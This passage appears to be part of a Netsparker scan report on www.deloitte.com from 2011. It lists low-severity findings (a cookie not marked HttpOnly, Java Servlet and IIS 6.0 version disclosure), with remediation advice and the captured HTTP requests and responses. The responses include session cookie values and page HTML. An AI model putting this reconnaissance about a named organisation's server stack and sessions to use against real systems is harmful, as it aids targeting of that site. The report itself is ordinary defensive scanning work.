weblogic.servlet.internal.WebAppServletContext$ServletInvocationAction.run(WebAppServletContext.java:3402) at weblogic.security.acl.internal.AuthenticatedSubject.doAs(AuthenticatedSubject.java:321) at weblogic.security.service.SecurityManager.runAs(Unknown Source) at weblogic.servlet.internal.WebAppServletContext.securedExecute(WebAppServletContext.java:2140) at weblogic.servlet.internal.WebAppServletContext.execute(WebAppServletContext.java:2046) at weblogic.servlet.internal.ServletRequestImpl.run(ServletRequestImpl.java:1398) at weblogic.work.ExecuteThread.execute(ExecuteThread.java:200) at weblogic.work.ExecuteThread.run(ExecuteThread.java:172) </pre></FONT></TD></TR></TABLE></BODY></HTML>
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.
Actions to Take
See the remedy for solution
Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as
XSS Tunnel to bypass HTTPOnly protection.
External References
- /view/en_US/us/officelocator
VignettePortal-NavTreeState-dcom
Request
GET /view/en_US/us/officelocator?key_OfficeCountry=US&key_City=Little+Rock HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.deloitte.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET,Servlet/2.5 JSP/2.1 Cache-Control: no-cache,no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Content-Encoding: Content-Length: 10976 Date: Mon, 20 Jun 2011 12:21:08 GMT Connection: keep-alive Set-Cookie: VignettePortal-NavTreeState-dcom=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/,JSESSIONID=02JSN17SwHNh42Zbc0LTgWklqLf7G3n7nvxf4vgvPKJ51WwS2YMG!-1257951137; path=/; HttpOnly=,BIGipServerwww64.deloitte.com=17297418.20480.0000; path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/vgn-ext-templating/common/styles/vgn-ext-templating.css" rel="stylesheet" type="text/css"/> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/swfobject.js"></script> <title>Deloitte | Audit, Consulting, Financial Advisory, Risk Management and Tax Services</title> <meta name="ROBOTS" content="ALL" /> <meta name="keywords" content="united states, keyword test" /> <script language="javascript"><!-- var omniture_saccount="deloittecomnewplatformprod"; //--></script> <script language="javascript"><!-- //--></script> <meta name="google-site-verification" content="37DiFXQl6h4P5Sli3Kwlq6yI0x9NrOaonJKW2HZ5ELw" /> <script language="javascript"><!-- //--></script> <meta name="google-site-verification" content="Gu6klRlOEfSbh5kCdbEMLV4fiElG-azZi-6Isdi4R-s" /> <script language="javascript"><!-- //--></script> <meta http-equiv="pragma" content="no-cache" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="description" content="US specific office locations description" /> <base target="_top" /> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/scripts/jquery-1.3.2.min.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jtip2.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.cluetip.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.platform.js"></script> <link rel="stylesheet" href="/deloitte-ecm-cm-dpm-web/common/hover/css/jquery.cluetip.css" type="text/css" /> <script type="text/javascript"> <!-- if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)){ //test for Firefox/x.x or Firefox x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/firefox/dtt-portal-dcom-global.css" type="text/css">'); } else if (/MSIE (\d+\.\d+);/.test(navigator.userAgent)){ //test for MSIE x.x; document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css">'); } else if (/Chrome[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {//test for Chrome/x.x or Chrome x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/chrome/dtt-portal-dcom-global.css" type="text/css">'); } else if (/Safari[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {//test for Safari/x.x or Safari x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/safari/dtt-portal-dcom-global.css" type="text/css">'); } else{ document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css">'); } //--> </script> <link id="defaultCssLink" rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css"> <script language="javascript"> <!-- var defaultCss = document.getElementById('defaultCssLink'); if(defaultCss != null){ defaultCss.parentNode.removeChild(defaultCss); } var versionNumber = ((navigator.appName=='Microsoft Internet Explorer')?parseFloat((new RegExp("MSIE ([0-9]{1,}[.0-9]{0,})")).exec(navigator.userAgent)[1]):-1); document.write("<span id='browserVersionNumber'>" + versionNumber + "</span>"); //--> </script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/eventDisplayTime.js" type="text/javascript"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/custom-form-elements.js" type="text/javascript"></script> </head> <body> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/s_code.js"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/printFormatScript.js"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/dcom/pageActions.js"></script> <script language="javascript" src="/portal/jslib/form_state_manager.js"></script> <div class='container' id='utilityPage'> <div id="header"> <a href="https://www.deloitte.com/view/en_US/us/index.htm"><img src="/deloitte-ecm-cm-dpm-web/images/dcom/new_deloitte_logo.gif" alt="Deloitte United States" title="Deloitte United States" name="logo" border="0" id="logo" /></a> <ul id="menuPrimary"> <li > <a href="/view/en_US/us/Services/index.htm">Services</a></li> <li > <a href="/view/en_US/us/Industries/index.htm">Industries</a></li> <li > <a href="/view/en_US/us/Insights/index.htm">Insights</a></li> <li > <a href="/view/en_US/us/Careers/index.htm">Careers</a></li> </ul> <ul id="menuSecondary"> <li > <a href="/view/en_US/us/About/index.htm">About</a></li> <li > <a href="/view/en_US/us/press/index.htm">Press</a></li> <li > <a href="/view/en_US/us/Events-Deloitte/index.htm">Events</a></li> <li > <a href="/view/en_US/us/Alumni/index.htm">Alumni</a></li> <li > <a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a></li> <li class = "lastMenuSecondary" > <a href="/view/en_US/us/Contact-us/index.htm">Contact</a></li> </ul> </div> <div id="breadcrumbs"> <a href='/view/en_GX/global/index.htm' title='Global'>Global</a> > <a href='/view/en_US/us/index.htm' title='United States'>United States</a> </div> <script language="javascript"> s.hier3 = "Global>United States"; s.pageName = "Global >United States"; </script> <div id="languageLinksDiv" > <div id="languageLinks"> </div> </div> <div id="preheader"> <script language="javascript"> function processSiteChange( cbo ){ var siteSelectorObj = document.getElementById("siteSelectorList"); //alert(siteSelectorObj.id) var selectedValue = siteSelectorObj.options[ siteSelectorObj.selectedIndex ].value; if(selectedValue != '0'){ window.location = siteSelectorObj.options[ siteSelectorObj.selectedIndex ].value; } } function submitOnEnter (e) { var ENTER_KEY = 13; var code = ""; if (window.event) // IE { code = e.keyCode; } else if (e.which) // Netscape/Firefox/Opera { code = e.which; } if (code == ENTER_KEY) { processSiteChange(); return false; } } </script> <div id="siteSelector"> <p id="siteSelected"> <select id="siteSelectorList" name="siteSelectorList" onkeypress="return submitOnEnter(event);" > <option value='0' selected >Global site selector</option> <option value='https://www.deloitte.com/view/en_GX/global/index.htm'>Global</option> <option value='https://www.deloitte.com/view/en_AL/al/index.htm'>Albania</option> <option value='https://www.deloitte.com/view/es_AR/ar/index.htm'>Argentina</option> <option value='https://www.deloitte.com/view/en_AU/au/index.htm'>Australia</option> <option value='https://www.deloitte.com/view/de_AT/at/index.htm'>Austria</option> <option value='https://www.deloitte.com/view/en_AZ/az/index.htm'>Azerbaijan</option> <option value='https://www.deloitte.com/view/en_BS/bs/index.htm'>Bahamas</option> <option value='https://www.deloitte.com/view/en_BH/bh/index.htm'>Bahrain</option> <option value='https://www.deloitte.com/view/en_BB/bb/index.htm'>Barbados</option> <option value='https://www.deloitte.com/view/ru_BY/by/index.htm'>Belarus</option> <option value='https://www.deloitte.com/view/en_BE/be/index.htm'>Belgium</option> <option value='https://www.deloitte.com/view/en_BM/bm/index.htm'>Bermuda</option> <option value='https://www.deloitte.com/view/en_BA/ba/index.htm'>Bosnia and Herzegovina</option> <option value='https://www.deloitte.com/view/pt_BR/br/index.htm'>Brazil</option> <option value='https://www.deloitte.com/view/en_VG/vg/index.htm'>British Virgin Islands</option> <option value='https://www.deloitte.com/view/en_BN/bn/index.htm'>Brunei Darussalam</option> <option value='https://www.deloitte.com/view/bg_BG/bg/index.htm'>Bulgaria</option> <option value='https://www.deloitte.com/view/en_CA/ca/index.htm'>Canada</option> <option value='https://www.deloitte.com/view/en_KY/ky/index.htm'>Cayman Islands</option> <option value='https://www.deloitte.com/view/en_XB/xb/index.htm'>Channel Islands and Isle of Man</option> <option value='https://www.deloitte.com/view/es_CL/cl/index.htm'>Chile</option> <option value='https://www.deloitte.com/view/zh_CN/cn/index.htm'>China</option> <option value='https://www.deloitte.com/view/es_CO/co/index.htm'>Colombia</option> <option value='https://www.deloitte.com/view/es_CR/cr/index.htm'>Costa Rica</option> <option value='https://www.deloitte.com/view/hr_HR/hr/index.htm'>Croatia</option> <option value='https://www.deloitte.com/view/en_CY/cy/index.htm'>Cyprus</option> <option value='https://www.deloitte.com/view/cs_CZ/cz/index.htm'>Czech Republic</option> <option value='https://www.deloitte.com/view/da_DK/dk/index.htm'>Denmark</option> <option value='https://www.deloitte.com/view/es_DO/do/index.htm'>Dominican Republic</option> <option value='https://www.deloitte.com/view/en_AN/an/index.htm'>Dutch Caribbean</option> <option value='https://www.deloitte.com/view/es_EC/ec/index.htm'>Ecuador</option> <option value='https://www.deloitte.com/view/en_EG/eg/index.htm'>Egypt</option> <option value='https://www.deloitte.com/view/es_SV/sv/index.htm'>El Salvador</option> <option value='https://www.deloitte.com/view/et_EE/ee/index.htm'>Estonia</option> <option value='https://www.deloitte.com/view/fi_FI/fi/index.htm'>Finland</option> <option value='https://www.deloitte.com/view/fr_FR/fr/index.htm'>France</option> <option value='https://www.deloitte.com/view/en_MK/mk/index.htm'>FYR Macedonia</option> <option value='https://www.deloitte.com/view/en_GE/ge/index.htm'>Georgia</option> <option value='https://www.deloitte.com/view/de_DE/de/index.htm'>Germany</option> <option value='https://www.deloitte.com/view/en_GR/gr/index.htm'>Greece</option> <option value='https://www.deloitte.com/view/en_GU/gu/index.htm'>Guam</option> <option value='https://www.deloitte.com/view/es_GT/gt/index.htm'>Guatemala</option> <option value='https://www.deloitte.com/view/es_HN/hn/index.htm'>Honduras</option> <option value='/cn'>Hong Kong SAR</option> <option value='https://www.deloitte.com/view/hu_HU/hu/index.htm'>Hungary</option> <option value='https://www.deloitte.com/view/is_IS/is/index.htm'>Iceland</option> <option value='https://www.deloitte.com/view/en_IN/in/index.htm'>India</option> <option value='https://www.deloitte.com/view/en_ID/id/index.htm'>Indonesia</option> <option value='https://www.deloitte.com/view/en_IE/ie/index.htm'>Ireland</option> <option value='https://www.deloitte.com/view/en_XD/xd/index.htm'>Islamic Finance</option> <option value='/xb'>Isle of Man and Channel Islands</option> <option value='https://www.deloitte.com/view/en_IL/il/index.htm'>Israel</option> <option value='https://www.deloitte.com/view/it_IT/it/index.htm'>Italy</option> <option value='https://www.deloitte.com/view/en_JM/jm/index.htm'>Jamaica</option> <option value='https://www.tohmatsu.com/view/ja_JP/jp/index.htm'>Japan</option> <option value='https://www.deloitte.com/view/en_JO/jo/index.htm'>Jordan</option> <option value='https://www.deloitte.com/view/en_KZ/kz/index.htm'>Kazakhstan</option> <option value='https://www.deloitte.com/view/en_KE/ke/index.htm'>Kenya</option> <option value='https://www.deloitte.com/view/ko_KR/kr/index.htm'>Korea</option> <option value='https://www.deloitte.com/view/en_KW/kw/index...
Java Servlet Version Disclosure
Java Servlet Version Disclosure
Netsparker identified that the target web server is using Java Servlet. This information was gathered from the HTTP Headers.
Impact
An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.
Configure your web server to prevent information leakage from the SERVER
header of its HTTP response.
- /view/en_US/us/officelocator
Servlet/2.5
Request
GET /view/en_US/us/officelocator?key_OfficeCountry=US&key_City=Little+Rock HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.deloitte.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET,Servlet/2.5 JSP/2.1 Cache-Control: no-cache,no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Content-Encoding: Date: Mon, 20 Jun 2011 12:21:08 GMT Content-Length: 10560 Connection: keep-alive Set-Cookie: VignettePortal-NavTreeState-dcom=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/,JSESSIONID=Q2Z8N17ShNnHh6RsFpmmZrZJVTWkG1JLjJpx8QwcHLbwVTfPvzhd!-129263600; path=/; HttpOnly=,BIGipServerwww64.deloitte.com=50851850.20480.0000; path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/vgn-ext-templating/common/styles/vgn-ext-templating.css" rel="stylesheet" type="text/css"/> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/swfobject.js"></script> <title>Deloitte | Audit, Consulting, Financial Advisory, Risk Management and Tax Services</title> <meta name="ROBOTS" content="ALL" /> <meta name="keywords" content="united states, keyword test" /> <script language="javascript"><!-- var omniture_saccount="deloittecomnewplatformprod"; //--></script> <script language="javascript"><!-- //--></script> <meta name="google-site-verification" content="37DiFXQl6h4P5Sli3Kwlq6yI0x9NrOaonJKW2HZ5ELw" /> <script language="javascript"><!-- //--></script> <meta name="google-site-verification" content="Gu6klRlOEfSbh5kCdbEMLV4fiElG-azZi-6Isdi4R-s" /> <script language="javascript"><!-- //--></script> <meta http-equiv="pragma" content="no-cache" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="description" content="US specific office locations description" /> <base target="_top" /> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/scripts/jquery-1.3.2.min.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jtip2.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.cluetip.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.platform.js"></script> <link rel="stylesheet" href="/deloitte-ecm-cm-dpm-web/common/hover/css/jquery.cluetip.css" type="text/css" /> <script type="text/javascript"> <!-- if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)){ //test for Firefox/x.x or Firefox x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/firefox/dtt-portal-dcom-global.css" type="text/css">'); } else if (/MSIE (\d+\.\d+);/.test(navigator.userAgent)){ //test for MSIE x.x; document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css">'); } else if (/Chrome[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {//test for Chrome/x.x or Chrome x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/chrome/dtt-portal-dcom-global.css" type="text/css">'); } else if (/Safari[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {//test for Safari/x.x or Safari x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/safari/dtt-portal-dcom-global.css" type="text/css">'); } else{ document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css">'); } //--> </script> <link id="defaultCssLink" rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css"> <script language="javascript"> <!-- var defaultCss = document.getElementById('defaultCssLink'); if(defaultCss != null){ defaultCss.parentNode.removeChild(defaultCss); } var versionNumber = ((navigator.appName=='Microsoft Internet Explorer')?parseFloat((new RegExp("MSIE ([0-9]{1,}[.0-9]{0,})")).exec(navigator.userAgent)[1]):-1); document.write("<span id='browserVersionNumber'>" + versionNumber + "</span>"); //--> </script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/eventDisplayTime.js" type="text/javascript"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/custom-form-elements.js" type="text/javascript"></script> </head> <body> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/s_code.js"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/printFormatScript.js"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/dcom/pageActions.js"></script> <script language="javascript" src="/portal/jslib/form_state_manager.js"></script> <div class='container' id='utilityPage'> <div id="header"> <a href="https://www.deloitte.com/view/en_US/us/index.htm"><img src="/deloitte-ecm-cm-dpm-web/images/dcom/new_deloitte_logo.gif" alt="Deloitte United States" title="Deloitte United States" name="logo" border="0" id="logo" /></a> <ul id="menuPrimary"> <li > <a href="/view/en_US/us/Services/index.htm">Services</a></li> <li > <a href="/view/en_US/us/Industries/index.htm">Industries</a></li> <li > <a href="/view/en_US/us/Insights/index.htm">Insights</a></li> <li > <a href="/view/en_US/us/Careers/index.htm">Careers</a></li> </ul> <ul id="menuSecondary"> <li > <a href="/view/en_US/us/About/index.htm">About</a></li> <li > <a href="/view/en_US/us/press/index.htm">Press</a></li> <li > <a href="/view/en_US/us/Events-Deloitte/index.htm">Events</a></li> <li > <a href="/view/en_US/us/Alumni/index.htm">Alumni</a></li> <li > <a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a></li> <li class = "lastMenuSecondary" > <a href="/view/en_US/us/Contact-us/index.htm">Contact</a></li> </ul> </div> <div id="breadcrumbs"> <a href='/view/en_GX/global/index.htm' title='Global'>Global</a> > <a href='/view/en_US/us/index.htm' title='United States'>United States</a> </div> <script language="javascript"> s.hier3 = "Global>United States"; s.pageName = "Global >United States"; </script> <div id="languageLinksDiv" > <div id="languageLinks"> </div> </div> <div id="preheader"> <script language="javascript"> function processSiteChange( cbo ){ var siteSelectorObj = document.getElementById("siteSelectorList"); //alert(siteSelectorObj.id) var selectedValue = siteSelectorObj.options[ siteSelectorObj.selectedIndex ].value; if(selectedValue != '0'){ window.location = siteSelectorObj.options[ siteSelectorObj.selectedIndex ].value; } } function submitOnEnter (e) { var ENTER_KEY = 13; var code = ""; if (window.event) // IE { code = e.keyCode; } else if (e.which) // Netscape/Firefox/Opera { code = e.which; } if (code == ENTER_KEY) { processSiteChange(); return false; } } </script> <div id="siteSelector"> <p id="siteSelected"> <select id="siteSelectorList" name="siteSelectorList" onkeypress="return submitOnEnter(event);" > <option value='0' selected >Global site selector</option> <option value='https://www.deloitte.com/view/en_GX/global/index.htm'>Global</option> <option value='https://www.deloitte.com/view/en_AL/al/index.htm'>Albania</option> <option value='https://www.deloitte.com/view/es_AR/ar/index.htm'>Argentina</option> <option value='https://www.deloitte.com/view/en_AU/au/index.htm'>Australia</option> <option value='https://www.deloitte.com/view/de_AT/at/index.htm'>Austria</option> <option value='https://www.deloitte.com/view/en_AZ/az/index.htm'>Azerbaijan</option> <option value='https://www.deloitte.com/view/en_BS/bs/index.htm'>Bahamas</option> <option value='https://www.deloitte.com/view/en_BH/bh/index.htm'>Bahrain</option> <option value='https://www.deloitte.com/view/en_BB/bb/index.htm'>Barbados</option> <option value='https://www.deloitte.com/view/ru_BY/by/index.htm'>Belarus</option> <option value='https://www.deloitte.com/view/en_BE/be/index.htm'>Belgium</option> <option value='https://www.deloitte.com/view/en_BM/bm/index.htm'>Bermuda</option> <option value='https://www.deloitte.com/view/en_BA/ba/index.htm'>Bosnia and Herzegovina</option> <option value='https://www.deloitte.com/view/pt_BR/br/index.htm'>Brazil</option> <option value='https://www.deloitte.com/view/en_VG/vg/index.htm'>British Virgin Islands</option> <option value='https://www.deloitte.com/view/en_BN/bn/index.htm'>Brunei Darussalam</option> <option value='https://www.deloitte.com/view/bg_BG/bg/index.htm'>Bulgaria</option> <option value='https://www.deloitte.com/view/en_CA/ca/index.htm'>Canada</option> <option value='https://www.deloitte.com/view/en_KY/ky/index.htm'>Cayman Islands</option> <option value='https://www.deloitte.com/view/en_XB/xb/index.htm'>Channel Islands and Isle of Man</option> <option value='https://www.deloitte.com/view/es_CL/cl/index.htm'>Chile</option> <option value='https://www.deloitte.com/view/zh_CN/cn/index.htm'>China</option> <option value='https://www.deloitte.com/view/es_CO/co/index.htm'>Colombia</option> <option value='https://www.deloitte.com/view/es_CR/cr/index.htm'>Costa Rica</option> <option value='https://www.deloitte.com/view/hr_HR/hr/index.htm'>Croatia</option> <option value='https://www.deloitte.com/view/en_CY/cy/index.htm'>Cyprus</option> <option value='https://www.deloitte.com/view/cs_CZ/cz/index.htm'>Czech Republic</option> <option value='https://www.deloitte.com/view/da_DK/dk/index.htm'>Denmark</option> <option value='https://www.deloitte.com/view/es_DO/do/index.htm'>Dominican Republic</option> <option value='https://www.deloitte.com/view/en_AN/an/index.htm'>Dutch Caribbean</option> <option value='https://www.deloitte.com/view/es_EC/ec/index.htm'>Ecuador</option> <option value='https://www.deloitte.com/view/en_EG/eg/index.htm'>Egypt</option> <option value='https://www.deloitte.com/view/es_SV/sv/index.htm'>El Salvador</option> <option value='https://www.deloitte.com/view/et_EE/ee/index.htm'>Estonia</option> <option value='https://www.deloitte.com/view/fi_FI/fi/index.htm'>Finland</option> <option value='https://www.deloitte.com/view/fr_FR/fr/index.htm'>France</option> <option value='https://www.deloitte.com/view/en_MK/mk/index.htm'>FYR Macedonia</option> <option value='https://www.deloitte.com/view/en_GE/ge/index.htm'>Georgia</option> <option value='https://www.deloitte.com/view/de_DE/de/index.htm'>Germany</option> <option value='https://www.deloitte.com/view/en_GR/gr/index.htm'>Greece</option> <option value='https://www.deloitte.com/view/en_GU/gu/index.htm'>Guam</option> <option value='https://www.deloitte.com/view/es_GT/gt/index.htm'>Guatemala</option> <option value='https://www.deloitte.com/view/es_HN/hn/index.htm'>Honduras</option> <option value='/cn'>Hong Kong SAR</option> <option value='https://www.deloitte.com/view/hu_HU/hu/index.htm'>Hungary</option> <option value='https://www.deloitte.com/view/is_IS/is/index.htm'>Iceland</option> <option value='https://www.deloitte.com/view/en_IN/in/index.htm'>India</option> <option value='https://www.deloitte.com/view/en_ID/id/index.htm'>Indonesia</option> <option value='https://www.deloitte.com/view/en_IE/ie/index.htm'>Ireland</option> <option value='https://www.deloitte.com/view/en_XD/xd/index.htm'>Islamic Finance</option> <option value='/xb'>Isle of Man and Channel Islands</option> <option value='https://www.deloitte.com/view/en_IL/il/index.htm'>Israel</option> <option value='https://www.deloitte.com/view/it_IT/it/index.htm'>Italy</option> <option value='https://www.deloitte.com/view/en_JM/jm/index.htm'>Jamaica</option> <option value='https://www.tohmatsu.com/view/ja_JP/jp/index.htm'>Japan</option> <option value='https://www.deloitte.com/view/en_JO/jo/index.htm'>Jordan</option> <option value='https://www.deloitte.com/view/en_KZ/kz/index.htm'>Kazakhstan</option> <option value='https://www.deloitte.com/view/en_KE/ke/index.htm'>Kenya</option> <option value='https://www.deloitte.com/view/ko_KR/kr/index.htm'>Korea</option> <option value='https://www.deloitte.com/view/en_KW/kw/index.h..
IIS Version Disclosure
IIS Version Disclosure
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.
Impact
An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.
Configure your web server to prevent information leakage from the SERVER
header of its HTTP response.
- /view/en_US/us/officelocator
Microsoft-IIS/6.0
Request
GET /view/en_US/us/officelocator?key_OfficeCountry=US&key_City=Little+Rock HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.deloitte.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET,Servlet/2.5 JSP/2.1 Cache-Control: no-cache,no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Content-Encoding: Date: Mon, 20 Jun 2011 12:21:08 GMT Content-Length: 10560 Connection: keep-alive Set-Cookie: VignettePortal-NavTreeState-dcom=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/,JSESSIONID=Q2Z8N17ShNnHh6RsFpmmZrZJVTWkG1JLjJpx8QwcHLbwVTfPvzhd!-129263600; path=/; HttpOnly=,BIGipServerwww64.deloitte.com=50851850.20480.0000; path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/vgn-ext-templating/common/styles/vgn-ext-templating.css" rel="stylesheet" type="text/css"/> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/swfobject.js"></script> <title>Deloitte | Audit, Consulting, Financial Advisory, Risk Management and Tax Services</title> <meta name="ROBOTS" content="ALL" /> <meta name="keywords" content="united states, keyword test" /> <script language="javascript"><!-- var omniture_saccount="deloittecomnewplatformprod"; //--></script> <script language="javascript"><!-- //--></script> <meta name="google-site-verification" content="37DiFXQl6h4P5Sli3Kwlq6yI0x9NrOaonJKW2HZ5ELw" /> <script language="javascript"><!-- //--></script> <meta name="google-site-verification" content="Gu6klRlOEfSbh5kCdbEMLV4fiElG-azZi-6Isdi4R-s" /> <script language="javascript"><!-- //--></script> <meta http-equiv="pragma" content="no-cache" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="description" content="US specific office locations description" /> <base target="_top" /> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/scripts/jquery-1.3.2.min.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jtip2.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.cluetip.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.platform.js"></script> <link rel="stylesheet" href="/deloitte-ecm-cm-dpm-web/common/hover/css/jquery.cluetip.css" type="text/css" /> <script type="text/javascript"> <!-- if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)){ //test for Firefox/x.x or Firefox x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/firefox/dtt-portal-dcom-global.css" type="text/css">'); } else if (/MSIE (\d+\.\d+);/.test(navigator.userAgent)){ //test for MSIE x.x; document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css">'); } else if (/Chrome[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {//test for Chrome/x.x or Chrome x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/chrome/dtt-portal-dcom-global.css" type="text/css">'); } else if (/Safari[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {//test for Safari/x.x or Safari x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/safari/dtt-portal-dcom-global.css" type="text/css">'); } else{ document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css">'); } //--> </script> <link id="defaultCssLink" rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css"> <script language="javascript"> <!-- var defaultCss = document.getElementById('defaultCssLink'); if(defaultCss != null){ defaultCss.parentNode.removeChild(defaultCss); } var versionNumber = ((navigator.appName=='Microsoft Internet Explorer')?parseFloat((new RegExp("MSIE 